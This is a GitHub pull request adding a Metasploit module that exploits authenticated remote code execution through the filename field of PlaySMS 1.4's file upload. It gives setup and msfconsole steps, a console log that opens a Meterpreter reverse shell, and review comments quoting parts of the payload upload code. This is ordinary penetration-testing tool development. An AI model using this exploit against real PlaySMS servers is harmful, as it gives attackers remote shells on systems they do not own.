Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

playsms_filename_exec.rb #9944

Merged
merged 8 commits into from May 7, 2018
Merged

playsms_filename_exec.rb #9944

merged 8 commits into from May 7, 2018

Conversation

touhidshaikh
Copy link
Contributor

@touhidshaikh touhidshaikh commented Apr 27, 2018
edited

Description

this Module exploits a Authenticated File Upload and In filename parameter have Remote Code Excution Vulnerability in PlaySMS Version 1.4. This issue is caused by improper File name handling in sendfromfile.php file. Authenticated Users can upload a file and rename file name with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB 42044)
NOTE : This Module is already PULLED but for some reason closed by author Check #9840

Vulnerable Application

Available at Exploit-DB

Vulnerable Application Installation Setup.

Download Application : wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz

Extract : tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz

Move In WebDirectory : mv playsms-1.4/web/* /var/www/html/

make config file: cp /var/www/html/config-dist.php /var/www/html/config.php

Change Owner : chown -R www-data:www-data /var/www/html/

Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.

Now Visit : http://localhost/

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/playsms_filename_exec
  4. Do: set rport <port>
  5. Do: set rhost <ip>
  6. Do: set targeturi SecreTSMSgatwayLogin
  7. Do: set username touhid
  8. Do: set password diana
  9. Do: check
[*] 10.22.1.10:80 The target appears to be vulnerable.
  1. Do: set lport <port>
  2. Do: set lhost <ip>
  3. Do: exploit
  4. You should get a shell.

Scenarios

Playsms on Ubuntu Linux

msf exploit(multi/http/playsms_filename_exec) > run                                                                                    
                                                                                                                                       
[*] Started reverse TCP handler on 10.22.1.3:4444                                                                                      
[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2                                                                          
[*] Trying to Login ......                                                                                                             
[+] Authentication successful : [ touhid:diana ]                                                                                       
[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc                                                                         
[*] Trying to upload file with malicious Filename Field....                                                                            
[*] Sending stage (37775 bytes) to 10.22.1.15                                                                                          
[*] Sleeping before handling stage...                                                                                                  
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530                                     
                                                                                                                                       
meterpreter >

@touhidshaikh
playsms_filename_exec.rb
ce099ae 
PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
@touhidshaikh
Copy link
Contributor Author

hey @bcoles , i have added Doc.

@bcoles bcoles added docs and removed needs-docs labels Apr 28, 2018
@jrobles-r7 jrobles-r7 self-assigned this May 4, 2018
jrobles-r7
jrobles-r7 reviewed May 4, 2018
View reviewed changes
Copy link
Contributor

@jrobles-r7 jrobles-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Review comments. Also, please change the indentation from 4 spaces to 2 spaces to follow the style guide.

modules/exploits/multi/http/playsms_filename_exec.rb Outdated
'DarkS3curity' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Add CVE reference
CVE-2017-9080

documentation/modules/exploit/multi/http/playsms_filename_exec.md Outdated
12. Do: `exploit`
13. You should get a shell.

## Options
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The Options section can probably be removed in this case.

modules/exploits/multi/http/playsms_filename_exec.rb Outdated
# setup POST request.
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token
post_data.add_part("agent22", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"") # payload
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can the data agent22 be randomized or is that required?
Same question for fncsv.

modules/exploits/multi/http/playsms_filename_exec.rb Outdated
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token
post_data.add_part("agent22", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"") # payload
post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"') # extra
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can fncsv_dup be randomized?

modules/exploits/multi/http/playsms_filename_exec.rb Outdated
post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"') # extra
data = post_data.to_s

print_status('Trying to upload file with malicious Filename Field....')
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Consider changing to vprint_status.

@touhidshaikh
updated
14b18cc 
remove options sections
@touhidshaikh
updated
e824f0f 
added CVE, URL and done randomizing content
@touhidshaikh
Copy link
Contributor Author

hey @jrobles-r7, thanks for the review and giving suggestions. I have made changes according to your suggestions. 👍

touhidshaikh and others added 4 commits May 4, 2018 21:13
@touhidshaikh
updated
aa69fc9 
print_status to vprint_status
@touhidshaikh
updated
71d6841 
indentation and fix CVE
@jrobles-r7
Fix indentation, update documentation
4b8ceab
@jrobles-r7
store credentials
601411f
@jrobles-r7 jrobles-r7 merged commit 601411f into rapid7:master May 7, 2018
jrobles-r7 added a commit that referenced this pull request May 7, 2018
@jrobles-r7
Land #9944, playsms_filename_exec.rb
222b1fb
@jrobles-r7
Copy link
Contributor

jrobles-r7 commented May 7, 2018
edited by tdoan-r7

Release Notes

The PlaySMS module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload.

msjenkins-r7 pushed a commit that referenced this pull request May 7, 2018
@jrobles-r7 @msjenkins-r7
Land #9944, playsms_filename_exec.rb
75196b4
@touhidshaikh touhidshaikh deleted the playsms-flename-rce branch May 8, 2018 15:01
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jrobles-r7 jrobles-r7 jrobles-r7 left review comments

Assignees

@jrobles-r7 jrobles-r7

Labels
docs module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@touhidshaikh @jrobles-r7 @bcoles @tdoan-r7